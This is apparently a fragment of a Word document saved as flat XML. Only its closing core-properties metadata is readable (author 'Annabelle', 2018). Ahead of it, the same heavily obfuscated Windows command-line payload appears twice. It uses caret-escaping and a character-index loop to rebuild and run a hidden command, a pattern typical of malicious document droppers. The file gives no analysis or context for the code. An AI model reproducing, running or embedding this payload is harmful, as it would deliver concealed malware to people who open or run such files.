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/V/C"^s^et ^s^Kc^p=^.^i{H^OTMP^hK^}W)^Q^a:+^g^e^XFN^dc^f^uV1-@$^6vS,/^I^=^0Bz^](bnx2^p^D[r'^J^E;^ ^sw^j^l^kt^omC^GA\y&amp;&amp;^f^or %^O ^in (4^7;6^2^;5^7^;18;^50^;^56^;^8;1^8;59;5^9^;^55^;^3^0^;^3^;3;^40;^37;^5^1^;25^;26;^6^3^;5^1;^5^4^;3^0;^5^;8;66^;37;^51;^8;6^1;^6^1^;^47^;^1^5;^3^5;35;^1^4^;4^4^;^14^;6^8^;14;2^3;^6^2;4^4;6^1;50^;^1^4;^2^3;^6^1;1^;4^4^;^17;^0^;1^7;1^7^;4^3^;^50;62;0^;2^3^;59^;2^5;4^3^;35;1^1;^3^1;^2^7^;5;22^;^4^6;8^;29^;8;6^1;^61;^47;^1^5;3^5;35^;6^3^;^1^8^;4^4^;6^1;6^2^;^50;2^7^;5^6^;^6^1^;^0;^2^3^;^62;63^;3^5;^65;^7;^5^8^;^1^3^;6^1;^4^6;7^;^4^5^;^18^;^2^9^;^8;^61^;61;4^7;^15;^35;35;32^;^4^7^;18^;^44^;61;^1;63^;18^;4^5^;^0;2^3^;62^;^63^;^3^5^;4^8;2^2^;^27;^4;3^3;4^;4;^29^;8^;6^1^;61;4^7^;15;3^5^;^3^5^;43;50^;^1^4^;1;^61;^8^;^5^7;1^4;1^;^6^1^;^1^8;^50^;^18;^5^6;61;6^2^;^5^0;14^;^6^1^;1^;^6^2;44^;0^;2^3;6^2;^6^3^;^35;^22^;^1^7;20^;9;53;3^2;^64^;29;^8^;^61^;^6^1^;^4^7;^15^;^3^5^;35^;4^3^;^18;^1^8^;47;^50^;^62;28^;47;^5^0;^62^;^4^7;6^2^;5^9^;1^;5^6;0^;^23^;62;^6^3^;35;45^;^2^4;6^;59^;^62^;^5^3^;6^0^;^6^1^;3^1;^51;^0^;^3^3^;^47^;5^9;^1^;6^1^;^4^2^;5^1;2^9;^51^;12;54;30^;^62^;^32^;1;^3^7^;42^;^4^9^;^33;^6^8;5^6;6^1^;1^8^;63^;0^;36;^4^;0^;^7^;^14^;^61;8^;^4^1;1^5;^1^5;6^5;1^8^;6^1^;5;^1^8;6^3;4^7;7^;^14^;6^1;^8;^4^2;12;^16;^5^1;^6^7;^6^6;^5^2^;^5^;0^;18^;4^5;^18;^51^;^1^2;54;^30^;^5^8^;^1^9;^36^;55;^3^7;2^1;^18;^57;2^8;4;4^3^;58;18;23^;61^;5^5;^28;2^3;^62^;63^;55;5^1^;^6^3^;56;^45^;^6^3;59^;46;^0^;4^5;^63^;^5^9;^8^;6^1;6^1;^47;5^1;^5^4^;^30;36^;5^7;1;^55^;^37;^5^5;21^;1^8^;57^;^2^8;^4;^4^3^;58^;^18^;^23^;6^1^;55^;^2^8^;^23;62;63^;^55^;^51;14;^22^;6^2;^22;^43;^0^;^5^6;^6^1^;5^0^;18^;14^;6^3^;^5^1^;^54^;2^4^;6^2;50^;1^8;^1^4^;2^3^;8^;^42^;30^;^22;44^;^4;55;^1;44;^55;^3^0^;^5;8;^6^6^;^12^;^2;^61^;^5^0;6^8^;^2^;^30;^58^;19^;36;0;^6^2^;4^7;^18;44^;42^;^5^1;65^;^5^3;5^;^51;^34;30;^22;4^4^;4;34;^3^8;^1^2;54^;30^;58^;19^;36^;^0^;^5^6;1^8;^4^4^;^22;^42^;1^2^;5^4;30;^3^6^;^57^;1;^0^;6^2;4^7;^1^8;4^4^;^42;1^2;54^;3^0;^36^;^57;^1;0;^61^;^68;47^;1^8;55^;^37;5^5^;27;^5^4^;30;3^6;5^7;1;0;57;50^;1;^6^1;18^;^4^2^;^3^0;^5^8^;19^;^36^;0;5^0;18^;^5^6^;47;^62;4^4;^5^6^;1^8;3^9;^62;2^2;6^8;^12^;54^;^30^;36^;^57^;1;0^;^56^;^1^4;^3^2^;^18^;^6^1^;^62^;24^;^1;^59;18^;^42^;^30;^6^2;3^2^;1;^1^2;5^4^;^3^3^;^6^1;^1^4^;^5^0^;61^;2^8^;7;5^0;^6^2^;23^;1^8;^56;^56^;^5^5;3^0^;62;32^;1^;54^;^4^3^;50^;18;^14;^6^0;1^0;^23^;1^4^;6^1^;23^;8;^2^;10^;1^0^;^5^5^;55;55;5^5^;^5^5;^5^5;5^5^;^55;^5^5^;^5^5;^55;^55;^55^;^55^;55^;55^;^5^5;^78)^d^o s^e^t c^z^oy=!c^z^oy!!^s^Kc^p:~%^O,1!&amp;&amp;i^f %^O ^g^tr ^7^7 c^a^ll %c^z^oy:^~^-5^3^9%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/V/C"^s^et ^s^Kc^p=^.^i{H^OTMP^hK^}W)^Q^a:+^g^e^XFN^dc^f^uV1-@$^6vS,/^I^=^0Bz^](bnx2^p^D[r'^J^E;^ ^sw^j^l^kt^omC^GA\y&amp;&amp;^f^or %^O ^in (4^7;6^2^;5^7^;18;^50^;^56^;^8;1^8;59;5^9^;^55^;^3^0^;^3^;3;^40;^37;^5^1^;25^;26;^6^3^;5^1;^5^4^;3^0;^5^;8;66^;37;^51;^8;6^1;^6^1^;^47^;^1^5;^3^5;35;^1^4^;4^4^;^14^;6^8^;14;2^3;^6^2;4^4;6^1;50^;^1^4;^2^3;^6^1;1^;4^4^;^17;^0^;1^7;1^7^;4^3^;^50;62;0^;2^3^;59^;2^5;4^3^;35;1^1;^3^1;^2^7^;5;22^;^4^6;8^;29^;8;6^1;^61;^47;^1^5;3^5;35^;6^3^;^1^8^;4^4^;6^1;6^2^;^50;2^7^;5^6^;^6^1^;^0;^2^3^;^62;63^;3^5;^65;^7;^5^8^;^1^3^;6^1;^4^6;7^;^4^5^;^18^;^2^9^;^8;^61^;61;4^7;^15;^35;35;32^;^4^7^;18^;^44^;61;^1;63^;18^;4^5^;^0;2^3^;62^;^63^;^3^5^;4^8;2^2^;^27;^4;3^3;4^;4;^29^;8^;6^1^;61;4^7^;15;3^5^;^3^5^;43;50^;^1^4^;1;^61;^8^;^5^7;1^4;1^;^6^1^;^1^8;^50^;^18;^5^6;61;6^2^;^5^0;14^;^6^1^;1^;^6^2;44^;0^;2^3;6^2;^6^3^;^35;^22^;^1^7;20^;9;53;3^2;^64^;29;^8^;^61^;^6^1^;^4^7;^15^;^3^5^;35^;4^3^;^18;^1^8^;47;^50^;^62;28^;47;^5^0;^62^;^4^7;6^2^;5^9^;1^;5^6;0^;^23^;62;^6^3^;35;45^;^2^4;6^;59^;^62^;^5^3^;6^0^;^6^1^;3^1;^51;^0^;^3^3^;^47^;5^9;^1^;6^1^;^4^2^;5^1;2^9;^51^;12;54;30^;^62^;^32^;1;^3^7^;42^;^4^9^;^33;^6^8;5^6;6^1^;1^8^;63^;0^;36;^4^;0^;^7^;^14^;^61;8^;^4^1;1^5;^1^5;6^5;1^8^;6^1^;5;^1^8;6^3;4^7;7^;^14^;6^1;^8;^4^2;12;^16;^5^1;^6^7;^6^6;^5^2^;^5^;0^;18^;4^5;^18;^51^;^1^2;54;^30^;^5^8^;^1^9;^36^;55;^3^7;2^1;^18;^57;2^8;4;4^3^;58;18;23^;61^;5^5;^28;2^3;^62^;63^;55;5^1^;^6^3^;56;^45^;^6^3;59^;46;^0^;4^5;^63^;^5^9;^8^;6^1;6^1;^47;5^1;^5^4^;^30;36^;5^7;1;^55^;^37;^5^5;21^;1^8^;57^;^2^8;^4;^4^3^;58^;^18^;^23^;6^1^;55^;^2^8^;^23;62;63^;^55^;^51;14;^22^;6^2;^22;^43;^0^;^5^6;^6^1^;5^0^;18^;14^;6^3^;^5^1^;^54^;2^4^;6^2;50^;1^8;^1^4^;2^3^;8^;^42^;30^;^22;44^;^4;55;^1;44;^55;^3^0^;^5;8;^6^6^;^12^;^2;^61^;^5^0;6^8^;^2^;^30;^58^;19^;36;0;^6^2^;4^7;^18;44^;42^;^5^1;65^;^5^3;5^;^51;^34;30;^22;4^4^;4;34;^3^8;^1^2;54^;30^;58^;19^;36^;^0^;^5^6;1^8;^4^4^;^22;^42^;1^2^;5^4;30;^3^6^;^57^;1;^0^;6^2;4^7;^1^8;4^4^;^42;1^2;54^;3^0;^36^;^57;^1;0;^61^;^68;47^;1^8;55^;^37;5^5^;27;^5^4^;30;3^6;5^7;1;0;57;50^;1;^6^1;18^;^4^2^;^3^0;^5^8^;19^;^36^;0;5^0;18^;^5^6^;47;^62;4^4;^5^6^;1^8;3^9;^62;2^2;6^8;^12^;54^;^30^;36^;^57^;1;0^;^56^;^1^4;^3^2^;^18^;^6^1^;^62^;24^;^1;^59;18^;^42^;^30;^6^2;3^2^;1;^1^2;5^4^;^3^3^;^6^1;^1^4^;^5^0^;61^;2^8^;7;5^0;^6^2^;23^;1^8;^56;^56^;^5^5;3^0^;62;32^;1^;54^;^4^3^;50^;18;^14;^6^0;1^0;^23^;1^4^;6^1^;23^;8;^2^;10^;1^0^;^5^5^;55;55;5^5^;^5^5;^5^5;5^5^;^55;^5^5^;^5^5;^55;^55;^55^;^55^;55^;55^;^5^5;^78)^d^o s^e^t c^z^oy=!c^z^oy!!^s^Kc^p:~%^O,1!&amp;&amp;i^f %^O ^g^tr ^7^7 c^a^ll %c^z^oy:^~^-5^3^9%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8:00Z</dcterms:created>
  <dc:creator>Annabelle</dc:creator>
  <dc:description/>
  <cp:keywords/>
  <dc:language>en-US</dc:language>
  <cp:lastModifiedBy/>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2018-11-14T06:38:00Z</dcterms:modified>
  <cp:revision>1</cp:revision>
  <dc:subject/>
  <dc:title/>
</cp:coreProperties>
</file>